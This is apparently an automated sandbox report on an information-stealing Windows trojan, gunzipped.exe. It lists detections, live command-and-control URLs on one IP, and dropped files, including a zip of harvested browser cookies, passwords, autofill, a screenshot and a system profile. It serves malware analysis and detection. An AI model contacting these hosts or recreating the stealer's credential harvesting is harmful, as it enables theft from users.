1.0.gunzipped.exe.7b0000.8.unpack	100%	Avira	TR/AD.Chapak.dvwuj	Download File
1.0.gunzipped.exe.7b0000.14.unpack	100%	Avira	TR/AD.Chapak.dvwuj	Download File
1.2.gunzipped.exe.7b0000.1.unpack	100%	Avira	HEUR/AGEN.1136795	Download File
1.0.gunzipped.exe.7b0000.12.unpack	100%	Avira	TR/AD.Chapak.dvwuj	Download File
1.0.gunzipped.exe.7b0000.4.unpack	100%	Avira	TR/AD.Chapak.dvwuj	Download File
1.0.gunzipped.exe.7b0000.10.unpack	100%	Avira	TR/AD.Chapak.dvwuj	Download File
1.0.gunzipped.exe.7b0000.6.unpack	100%	Avira	TR/AD.Chapak.dvwuj	Download File
1.0.gunzipped.exe.7b0000.2.unpack	100%	Avira	TR/AD.Chapak.dvwuj	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://2.56.57.108/osk//4.jpg	0%	Avira URL Cloud	safe
http://2.56.57.108/osk//5.jpg	0%	Avira URL Cloud	safe
http://2.56.57.108/osk//main.php	0%	Avira URL Cloud	safe
http://ocsp.thawte.com0	0%	URL Reputation	safe
http://www.mozilla.com0	0%	URL Reputation	safe
http://2.56.57.108/osk//1.jpg	0%	Avira URL Cloud	safe
http://2.56.57.108/osk//6.jpg	0%	Avira URL Cloud	safe
http://2.56.57.108/osk//2.jpg	0%	Avira URL Cloud	safe
http://2.56.57.108/osk//7.jpg	0%	Avira URL Cloud	safe
http://2.56.57.108/osk//1.jpghttp://2.56.57.108/osk//4.jpghttp://2.56.57.108/osk//7.jpghttp://2.56.5	0%	Avira URL Cloud	safe
http://2.56.57.108/osk//3.jpg	0%	Avira URL Cloud	safe
http://2.56.57.108/osk//5.jpg2	0%	Avira URL Cloud	safe
http://2.56.57.108/osk/	0%	Avira URL Cloud	safe
http://2.56.57.108/osk//2.jpghttp://2.56.57.108/osk//6.jpghttp://2.56.57.108/osk//3.jpghttp://2.56.5	0%	Avira URL Cloud	safe
http://2.56.57.108/osk//7.jpgB	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://2.56.57.108/osk//4.jpg	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk//5.jpg	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk//main.php	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk//1.jpg	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk//6.jpg	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk//2.jpg	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk//7.jpg	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk//3.jpg	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	false		high
http://www.mozilla.com/en-US/blocklist/	mozglue.dll.1.dr	false		high
https://duckduckgo.com/ac/?q=	gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	false		high
https://support.google.com/chrome/answer/6258784	gunzipped.exe, 00000001.00000002.333464446.00000000031F0000.00000004.00000001.sdmp	false		high
http://ocsp.thawte.com0	gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	true	URL Reputation: safe	unknown
http://www.mozilla.com0	gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	true	URL Reputation: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	false		high
https://support.google.com/chrome/?p=plugin_flash	gunzipped.exe, 00000001.00000002.333464446.00000000031F0000.00000004.00000001.sdmp	false		high
https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search	gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	false		high
http://nsis.sf.net/NSIS_ErrorError	gunzipped.exe	false		high
https://ac.ecosia.org/autocomplete?q=	gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	false		high
http://nsis.sf.net/NSIS_Error	gunzipped.exe	false		high
http://crl.thawte.com/ThawteTimestampingCA.crl0	gunzipped.exe, 00000001.00000003.317919411.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.314059612.00000000031F1000.00000004.00000001.sdmp, gunzipped.exe, 00000001.00000003.317143663.00000000031F1000.00000004.00000001.sdmp, softokn3.dll.1.dr, mozglue.dll.1.dr, nss3.dll.1.dr, freebl3.dll.1.dr	false		high
http://2.56.57.108/osk//1.jpghttp://2.56.57.108/osk//4.jpghttp://2.56.57.108/osk//7.jpghttp://2.56.5	gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk//5.jpg2	gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk//2.jpghttp://2.56.57.108/osk//6.jpghttp://2.56.57.108/osk//3.jpghttp://2.56.5	gunzipped.exe, 00000001.00000002.332379792.000000000091C000.00000004.00000010.sdmp	true	Avira URL Cloud: safe	unknown
http://2.56.57.108/osk//7.jpgB	gunzipped.exe, 00000001.00000002.332482820.0000000000C4A000.00000004.00000020.sdmp	true	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	false		high
https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	gunzipped.exe, 00000001.00000003.326516330.0000000000C97000.00000004.00000001.sdmp, temp.1.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
2.56.57.108	unknown	Netherlands		395800	GBTCLOUDUS	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	548641
Start date:	06.01.2022
Start time:	07:56:19
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 54s
Hypervisor based Inspection enabled:	false
Report type:	light
Sample file name:	gunzipped.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	6
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@8/15@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 69.7% (good quality ratio 68%) Quality average: 82.6% Quality standard deviation: 25.3%
HCA Information:	Successful, ratio: 92% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe Stop behavior analysis, all processes terminated
Warnings:	Show All Exclude process from analysis (whitelisted): backgroundTaskHost.exe TCP Packets have been reduced to 100 Excluded IPs from analysis (whitelisted): 20.50.102.62 Excluded domains from analysis (whitelisted): arc.trafficmanager.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, arc.msn.com Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

No context

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\834793065949733\_8347930659.zip Download File
Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	87180
Entropy (8bit):	7.994272606647258
Encrypted:	true
SSDEEP:	1536:RYOKrOJmhh6RQ2i1PVaU61rL5kjkM816fMU8MYYljFCO3p26+tjoaO5mL1:COKWmWRL91/qjkM8160QjEq26oMfG1
MD5:	20E941DA619EC55FB66739FDBB3AE60A
SHA1:	3B753E336E1FC00DED7B5A00F814A7CC4A00C371
SHA-256:	2D03A2D1771B18DC04FB65ABE96BA5CAED60C75107642FD85175CDE7D693B24A
SHA-512:	9320EC436349BE201C3B7B53124134E7FB9E8F508808C9489AA1FF1DFAB4BB11E3F32014F41244A2019686A8CE58C69CFD3B21B6880C5867EEABF8B9B872A018
Malicious:	false
Reputation:	low
Preview:	PK........ .&T............"...autofill/Google Chrome_Default.txtUT...l..al..al..a..PK........ .&T................cc/Google Chrome_Default.txtUT...l..al..al..a..PK........>.&T\~.l........!...cookies/Google Chrome_Default.txtUT...k..ak..ak..a-..N.0...3&>..............B.ip.....O......e.gy....4g.....}v.!N.S.....,\[..\|..5.V-...=.kBiJ?.+....]..}.h....y..Lt.Sb.:}.cS..KO.\.r..,.....M6.X... ....q9..3..v.@..z..71..t.Up..CS.~..g.mo.....PK........ .&T................outlook.txtUT...l..al..al..a..PK........>.&T................passwords.txtUT...k..ak..ak..a..PK........".&T....I...Y......screenshot.jpgUT...m..am..am..a..gX.m.6...H...H.jB....J......H@."]..h.w...W.M.T).A...4.{.}...>....{.1qf2.z.s..Z..r.....\YM.....z...]N..@d$$.$.d......S.....d....cg..`cac..yp...ee.P............$..@FV...<...))(.o.`...A.....l.Q....@.xl \|j<.j..V....G.w...............u`... \|<..\|B.""BB.[/.{.!5.MVA..[..$l.`!....4...asG.kd.....8..A..".b..%$...UT..z...F.P..[..B[;.vvqus.........&2:&6..SBzF&6+;'7.KYyEeUuM

C:\ProgramData\834793065949733\cookies\Google Chrome_Default.txt Download File
Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	218
Entropy (8bit):	5.787907296270898
Encrypted:	false
SSDEEP:	6:PkopYjdSQHo3HWvmWogYmmYIkV0NAXhtfx:copYxzkYLmWV0Ghtp
MD5:	550A7FD2AB480B2F537E0CB278AB1906
SHA1:	3B890274F3CFC06C13E6CB6B048FFB6D5E80BB34
SHA-256:	461A1E12872241809075955E29ED062E3283BF5BDA7B04DD59D35525D01076FA
SHA-512:	215B8EF44D47B8FA461778F906A78E3853A55EA06B5620458CBC61E1B3BCB93B43E938A6C6F6DE632FC7B0AB61822465C19CB0F90B202877CF102AEDE7B8E346
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.google.com.FALSE./.FALSE.1617282077.NID.204=Zby1pa4NqcXVsIGE_3ZmaJyb6wd0ytCetXAGAYyCxqs2oB7GnI3pgyhDqSLplEUbd5KtDmFut9_ZUC4e6qUSqOJD3t1X1QzZ6EDKsemEKsaJT7QdaJ3DLNev4XjTqyplJqeiHY0L0dD9AvRUlTYjHSmBPUv-_Y4cj4q4NBiv_34..

C:\ProgramData\834793065949733\screenshot.jpg Download File
Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	88545
Entropy (8bit):	7.893983839500802
Encrypted:	false
SSDEEP:	1536:/gGITLpOsaHNgmatX11YV/BhnWdHB8bR1GH5fwT90OmO2DZkun5HuFBLVfD8Vtyy:IGIROsUMHmae7U5fggNDZkutuDJfE
MD5:	7F5FC67C3596CACA2555486AD1BD7E93
SHA1:	F12A8FE3FDF6ECA7155D126E0DB43C5B3467CC05
SHA-256:	F19517B03A8B3F840567EB32AC900A69632130709404485324D61C05A2542C1B
SHA-512:	02B8F4C17798B714F79337E769D72982B2FBE97455F55B7BB0E3C43C980F3CC369E230F701C345219D5597B812D447FCADAA1FF32AA5AC4DF144C96973D75CB5
Malicious:	false
Reputation:	low
Preview:	......JFIF.....`.`.....C...........................#.%$"."!&+7/&)4)!"0A149;>>>%.DIC<H7=>;...C...........;("(;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..1E..+....+R.....r..V.HY.m.q.......o...s<.-........RrHi6r.....i...#...36........J2lo#..9......E.i...%[.......XA8Ve.[....Uj...Ju%.!..4..4.W.M.e.l6...~.....G........$...:..a.N._...#.a....1...P.....3..I...u.Z...n.ya.y.e...n..g..V.q4.6...:S...QEt...Q@..)k.>..'C.N.yq...$..lVIYx..8..QWcJ.....?.\|...>......\|!..>.?.....%.6\|.Ez.~..}..O.......y.y..N9..%.7.F.D(.p......

C:\ProgramData\834793065949733\system.txt Download File
Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	ISO-8859 text, with CRLF line terminators
Category:	dropped
Size (bytes):	9541
Entropy (8bit):	5.117822683870144
Encrypted:	false
SSDEEP:	96:7cpOmrVJZuauz0NpIKXDplsdM984uRAuzQ7uZUM9QYh1FcGEcLbLaAhy0/roqQck:7UOm5JZPewHranRAJhusXca4hLCPTNAY
MD5:	ED8730C613A0A5DC9E9E9CE1F24E27ED
SHA1:	B2009BBB38C03BD645544F4C17B9278F977E011D
SHA-256:	7CF0919C9D331047CAE91B4A2B3795E321C39E86EC864724BE1D9678FC7C81E2
SHA-512:	36614CEE37B12EE28CDF53B6D0310475C1D73F3BA0A7EBFD3A5F1592CD65334656F2240B2727EB00C91C8FA2F8B779E123A81C2E0BC054721DC8FF80053F1010
Malicious:	false
Reputation:	low
Preview:	System ---------------------------------------------------..Windows: Windows 10 Pro..Bit: x64..User: user..Computer Name: 284992..System Language: en-US..Machine ID: d06ed635-68f6-4e9a-955c-4899f5f57b9a..GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}..Domain Name: Unknown..Workgroup: UOOJJOZ..Keyboard Languages: English (United States)....Hardware -------------------------------------------------..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..Logical processors: 4..Videocard: Microsoft Basic Display Adapter..Display: 1280x1024..RAM: 8191 MB..Laptop: No....Time -----------------------------------------------------..Local: 6/1/2022 7:57:32..Zone: UTC-8....Network --------------------------------------------------..IP: IP?..Country: Country?....Installed Softwrare --------------------------------------..Google Chrome 85.0.4183.121..Microsoft Office Professional Plus 2016 16.0.4266.1001..Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 12.0.30501.0..Microsoft Visual C++ 201

C:\ProgramData\834793065949733\temp Download File
Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll Download File
Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334288
Entropy (8bit):	6.807000203861606
Encrypted:	false
SSDEEP:	6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
MD5:	EF2834AC4EE7D6724F255BEAF527E635
SHA1:	5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
SHA-256:	A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
SHA-512:	C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll Download File
Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.78390291752429
Encrypted:	false
SSDEEP:	3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
MD5:	8F73C08A9660691143661BF7332C3C27
SHA1:	37FA65DD737C50FDA710FDBDE89E51374D0C204A
SHA-256:	3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
SHA-512:	0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll Download File
Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll Download File
Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1246160
Entropy (8bit):	6.765536416094505
Encrypted:	false
SSDEEP:	24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
MD5:	BFAC4E3C5908856BA17D41EDCD455A51
SHA1:	8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
SHA-256:	E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
SHA-512:	2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll Download File
Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.539750563864442
Encrypted:	false
SSDEEP:	3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
MD5:	A2EE53DE9167BF0D6C019303B7CA84E5
SHA1:	2A3C737FA1157E8483815E98B666408A18C0DB42
SHA-256:	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
SHA-512:	45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\sqlite3.dll Download File
Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	645592
Entropy (8bit):	6.50414583238337
Encrypted:	false
SSDEEP:	12288:i0zrcH2F3OfwjtWvuFEmhx0Cj37670jwX+E7tFKm0qTYh:iJUOfwh8u9hx0D70NE7tFTYh
MD5:	E477A96C8F2B18D6B5C27BDE49C990BF
SHA1:	E980C9BF41330D1E5BD04556DB4646A0210F7409
SHA-256:	16574F51785B0E2FC29C2C61477EB47BB39F714829999511DC8952B43AB17660
SHA-512:	335A86268E7C0E568B1C30981EC644E6CD332E66F96D2551B58A82515316693C1859D87B4F4B7310CF1AC386CEE671580FDD999C3BCB23ACF2C2282C01C8798C
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....=S.v..?......!................X..............`......................... ......8......... .................................L................................'......................................................p............................text...............................`.0`.data...............................@.@..rdata..$...........................@.@@.bss..................................@..edata..............................@.0@.idata..L...........................@.0..CRT................................@.0..tls.... ...........................@.0..reloc...'.......(..................@.0B/4......`....0......................@.@B/19..........@......................@..B/35.....M....P......................@..B/51.....`C...`...D..................@..B/63..................8..............@..B/77..................F..............@..B/89..................R..

C:\ProgramData\vcruntime140.dll Download File
Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\3lzr9t8b2fewpx2 Download File
Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	data
Category:	dropped
Size (bytes):	219981
Entropy (8bit):	7.981423807586789
Encrypted:	false
SSDEEP:	6144:2eRavIfKu1GgOyEbEqY/95w4++iNHEcYfeK:26TfKxyEYqG4Nex
MD5:	67C52576EB74D18C73D0BE686FE1BF42
SHA1:	57151D72EED1183BC2C30B2D01AF07A33BE98D0E
SHA-256:	9F9DB61E4AB13EA92FDBC6F2D8DEE31856A1D73C21707F124C877EF11064BC88
SHA-512:	EB2D5A3DC325EAC92542BAE637B80C29E3A70F159E82111519FAD98086F8D36F7A1C013D172465C0E1489D68A473EE3D8376423AA3AB6C07E8D4CBB59EE51F00
Malicious:	false
Preview:	..l..)I...,6L..F.H..0..s........j.Y...9...f.SC....}.1...\d....".R.....8.. ..y@7.]....W..5.0.V.9.....r.:A.DI...`...z1P..(..[!.v;.g.c...ku/.L8.]P.I.[S@S.?yl.g.D#y\%..T..A..[HZ....3.=...k.=D...}Sp..,...[.,S.._.P..V.....:.t......p....d...@...7....%....`...m.?Lf.F.H.....s.....5..j.a..9...f..CW...}.8...\dB..}".+.....q...o..V.Z...#r....M......2..F.G.WW....!.z1P..(Y...."...@..[c....R_.....1W....,[....f.`..Q.8....,...".i.)t<J,...'.V.@.-o...jEq./..R.dl.......:.t.j~...p...ucd.E....?.7"...%..1.)I4....6.h.p.....b.s.<(....j.....9...f.SC..^.}.>.%.\d]..}"....{..7..Zo..V......r.w....s.R......F....l.!.l!.z1P..(Y...z."^..@..[c...m.=......1W....,[....f.`..Q.8....,.PFB...)t<J,...'.V\|../1...jEq./..R.dl.......:.t......p...g.d.z....>.7....%..1.)I4..m.6Lf.F.H.....s........j.Y...9...f.SC....}.1...\dBY.}".+.....7..Zo..V......r.w...M..H....2..F.G...l.!..!.z1P..(Y...."...@..[c...m.=......1W....,[....f.`..Q.8....,.PFB...)t<J,...'.V\|../1...jEq./..R.dl.......:.t.

C:\Users\user\AppData\Local\Temp\dxaqqkiiu Download File
Process:	C:\Users\user\Desktop\gunzipped.exe
File Type:	data
Category:	dropped
Size (bytes):	5310
Entropy (8bit):	6.074693172615159
Encrypted:	false
SSDEEP:	96:csHekArsTG+RpE77i+tPgQeyXvuY9Hy0zjvvO8RgaHK1wyCX//yJj0WsS0gDr4Z4:THH7pEPF5HPXvuMS0z7vpRgaqzCXSquh
MD5:	8353B19099AFDFB112BB96A1C747E5D0
SHA1:	101FA6D10ECABCE84D5B78CDF0C722F276E5EEB7
SHA-256:	4CD618A1C5962A8FA87614B875CA3B3F863FB0EC5CF380056E146767C458A2FE
